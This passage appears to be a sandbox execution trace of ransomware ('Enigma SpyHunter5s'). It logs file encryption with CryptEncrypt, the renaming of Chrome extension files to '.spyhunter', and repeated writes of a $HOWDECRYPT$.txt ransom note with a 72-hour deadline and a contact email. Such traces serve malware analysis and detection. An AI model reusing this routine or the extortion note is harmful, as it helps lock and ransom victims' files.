(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.883] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cebdc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cebdc*=0x2ac, lpOverlapped=0x0) returned 1 [0159.883] CloseHandle (hObject=0x178) returned 1 [0159.887] GetProcessHeap () returned 0x2c0000 [0159.887] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1b180 | out: hHeap=0x2c0000) returned 1 [0159.887] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb78 | out: pbBuffer=0x25ceb78) returned 1 [0159.887] GetProcessHeap () returned 0x2c0000 [0159.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.887] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb70*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb70*=0x30) returned 1 [0159.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.888] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json") returned 159 [0159.888] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.889] GetProcessHeap () returned 0x2c0000 [0159.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.890] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb34*=0x3ad, lpOverlapped=0x0) returned 1 [0159.922] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffc53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.922] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3ad, lpNumberOfBytesWritten=0x25ceb34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb34*=0x3ad, lpOverlapped=0x0) returned 1 [0159.922] GetProcessHeap () returned 0x2c0000 [0159.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.922] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.922] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb34, lpOverlapped=0x0 | out: lpBuffer=0x25ceb74*, lpNumberOfBytesWritten=0x25ceb34*=0x4, lpOverlapped=0x0) returned 1 [0159.922] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb34, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb34*=0x30, lpOverlapped=0x0) returned 1 [0159.923] CloseHandle (hObject=0x178) returned 1 [0159.923] GetProcessHeap () returned 0x2c0000 [0159.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.923] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.spyhunter") returned 169 [0159.923] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.spyhunter")) returned 1 [0159.924] GetProcessHeap () returned 0x2c0000 [0159.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.924] GetProcessHeap () returned 0x2c0000 [0159.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.924] GetProcessHeap () returned 0x2c0000 [0159.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f801e8 | out: hHeap=0x2c0000) returned 1 [0159.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.925] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.925] WriteFile (in: hFile=0x178, lpBuffer=0x25ceaab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cebd4, lpOverlapped=0x0 | out: lpBuffer=0x25ceaab*, lpNumberOfBytesWritten=0x25cebd4*=0x127, lpOverlapped=0x0) returned 1 [0159.926] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.926] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cebd4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cebd4*=0x2ac, lpOverlapped=0x0) returned 1 [0159.927] CloseHandle (hObject=0x178) returned 1 [0159.927] GetProcessHeap () returned 0x2c0000 [0159.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1a988 | out: hHeap=0x2c0000) returned 1 [0159.927] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb70 | out: pbBuffer=0x25ceb70) returned 1 [0159.927] GetProcessHeap () returned 0x2c0000 [0159.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.927] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb68*=0x30) returned 1 [0159.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.929] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json") returned 159 [0159.929] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.929] GetProcessHeap () returned 0x2c0000 [0159.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.929] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb2c*=0x261, lpOverlapped=0x0) returned 1 [0159.959] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.959] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x261, lpNumberOfBytesWritten=0x25ceb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb2c*=0x261, lpOverlapped=0x0) returned 1 [0159.959] GetProcessHeap () returned 0x2c0000 [0159.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.959] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.959] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb2c, lpOverlapped=0x0 | out: lpBuffer=0x25ceb6c*, lpNumberOfBytesWritten=0x25ceb2c*=0x4, lpOverlapped=0x0) returned 1 [0159.959] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb2c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb2c*=0x30, lpOverlapped=0x0) returned 1 [0159.960] CloseHandle (hObject=0x178) returned 1 [0159.960] GetProcessHeap () returned 0x2c0000 [0159.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.960] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.spyhunter") returned 169 [0159.960] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.spyhunter")) returned 1 [0159.961] GetProcessHeap () returned 0x2c0000 [0159.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.962] GetProcessHeap () returned 0x2c0000 [0159.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.962] GetProcessHeap () returned 0x2c0000 [0159.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80060 | out: hHeap=0x2c0000) returned 1 [0159.962] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb70 | out: pbBuffer=0x25ceb70) returned 1 [0159.962] GetProcessHeap () returned 0x2c0000 [0159.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.962] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb68*=0x30) returned 1 [0159.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png") returned 153 [0159.963] StrStrW (lpFirst="icon_128.png", lpSrch=".txt") returned 0x0 [0159.963] GetProcessHeap () returned 0x2c0000 [0159.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.963] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb2c*=0x1109, lpOverlapped=0x0) returned 1 [0160.130] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffeef7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.130] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1109, lpNumberOfBytesWritten=0x25ceb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb2c*=0x1109, lpOverlapped=0x0) returned 1 [0160.130] GetProcessHeap () returned 0x2c0000 [0160.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0160.130] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.130] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb2c, lpOverlapped=0x0 | out: lpBuffer=0x25ceb6c*, lpNumberOfBytesWritten=0x25ceb2c*=0x4, lpOverlapped=0x0) returned 1 [0160.130] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb2c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb2c*=0x30, lpOverlapped=0x0) returned 1 [0160.131] CloseHandle (hObject=0x178) returned 1 [0160.131] GetProcessHeap () returned 0x2c0000 [0160.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0160.131] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.spyhunter") returned 163 [0160.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png.spyhunter")) returned 1 [0160.132] GetProcessHeap () returned 0x2c0000 [0160.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0160.132] GetProcessHeap () returned 0x2c0000 [0160.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.132] GetProcessHeap () returned 0x2c0000 [0160.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7f88 | out: hHeap=0x2c0000) returned 1 [0160.133] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.134] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.134] WriteFile (in: hFile=0x178, lpBuffer=0x25cea9f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cebc8, lpOverlapped=0x0 | out: lpBuffer=0x25cea9f*, lpNumberOfBytesWritten=0x25cebc8*=0x127, lpOverlapped=0x0) returned 1 [0160.135] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.135] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cebc8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cebc8*=0x2ac, lpOverlapped=0x0) returned 1 [0160.135] CloseHandle (hObject=0x178) returned 1 [0160.135] GetProcessHeap () returned 0x2c0000 [0160.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f5a8 | out: hHeap=0x2c0000) returned 1 [0160.135] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.136] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.136] WriteFile (in: hFile=0x178, lpBuffer=0x25cea9b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cebc4, lpOverlapped=0x0 | out: lpBuffer=0x25cea9b*, lpNumberOfBytesWritten=0x25cebc4*=0x127, lpOverlapped=0x0) returned 1 [0160.137] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.137] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cebc4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cebc4*=0x2ac, lpOverlapped=0x0) returned 1 [0160.137] CloseHandle (hObject=0x178) returned 1 [0160.137] GetProcessHeap () returned 0x2c0000 [0160.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f420 | out: hHeap=0x2c0000) returned 1 [0160.138] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb60 | out: pbBuffer=0x25ceb60) returned 1 [0160.138] GetProcessHeap () returned 0x2c0000 [0160.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.138] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb58*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb58*=0x30) returned 1 [0160.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 